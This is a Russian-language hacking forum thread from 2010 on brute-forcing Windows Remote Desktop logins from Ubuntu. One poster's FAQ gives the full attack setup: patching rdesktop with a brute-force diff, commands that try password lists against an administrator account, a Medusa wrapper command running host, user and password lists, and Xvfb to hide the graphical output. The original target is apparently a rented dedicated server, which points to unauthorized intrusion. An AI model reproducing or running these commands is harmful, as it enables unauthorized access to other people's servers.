RDP brut под ubuntu 9.10

Discussion in 'Безопасность и Анонимность' started by iSlava, 31 Jan 2010.

  1. iSlava

    iSlava New Member

    Joined:
    24 Aug 2009
    Messages:
    72
    Likes Received:
    4
    Reputations:
    0
    долго искал брут rdp под линух, нашел вот патчик к rdesktop
    www.hacktoolrepository.com
    ставлю по написанному, говорит что пропатчилось удачно,
    а при запуске
    rdesktop -u administrator -p passwords.txt ipdedik
    получаю такую туфту (наверное берет первый пароль из пасслиста, он оказывается неверным)
    [​IMG]
    после жмакания [OK] предлагается продолжать ручками.
    Прошу вашей помощи в решении сией проблемы.
    Если знаете чем еще можно побрутить, буду рад узнать
     
    #1 iSlava, 31 Jan 2010
    Last edited: 31 Jan 2010
    1 person likes this.
  2. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    та я тож парился помню с rdesktopom!хз чо ему нады!попрбуй из под вайна запустить виндовый брутер! это походу rdesktop не понимает шо ему ответили
     
    1 person likes this.
  3. iSlava

    iSlava New Member

    Joined:
    24 Aug 2009
    Messages:
    72
    Likes Received:
    4
    Reputations:
    0
    Проблему решил давно, решил написать сюда маленький faq по установке и использованию

    1. Удалите действующий rdekstop
    sudo apt-get remove rdekstop
    2. Скачайте rdesktop версии 1.5 с www.rdesktop.org
    3. Скачайте патч http://www.foofus.net/jmk/rdesktop.html

    Патчим rdesktop

    cd rdesktop1.50/
    patch -p1 -i rdp-brute-force-r805.diff
    ./configure
    make
    make install


    Использование


    Brute-force атака с использованием пасслиста:
    Code:
    rdesktop -u administrator -p passwords.txt 192.168.0.100
    Brute-force атака посылая пароли через STDIN:
    Code:
    rdesktop -u administrator -p - 192.168.0.100
    Следующий пример - способ использования rdesktop c обёрткой модуля MEDUSA

    Code:
    medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -H hosts.txt -U users.txt -P passwords.txt 
    Возможный метод для скрытия графического вывода rdeesktop
    Code:
    % Xvfb :97 -ac -nolisten tcp &
    % export DISPLAY=:97
     
    2 people like this.
  4. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    в чем трабла, делаю значит так:
    файл host:
    файл users:
    файл passwd
    Запускаю:
     
    2 people like this.
  5. iSlava

    iSlava New Member

    Joined:
    24 Aug 2009
    Messages:
    72
    Likes Received:
    4
    Reputations:
    0
    бред, но всё таки попробуй выполнить из папки с rdesktop'ом.
    тут почитай http://www.foofus.net/jmk/medusa/medusa-wrapper.html
    попробуй пересобрать
    Code:
    skvoz@x> cd rdesktop/
    skvoz@x> ./bootstrap
    skvoz@x> ./configure
    skvoz@x> make
     
    #5 iSlava, 20 Feb 2010
    Last edited: 20 Feb 2010
  6. zah_al

    zah_al New Member

    Joined:
    6 May 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    блин, сделал всё по вашему faq и чёта один фиг, только 1-й пароль принимает и всё. Чё сделать то можно?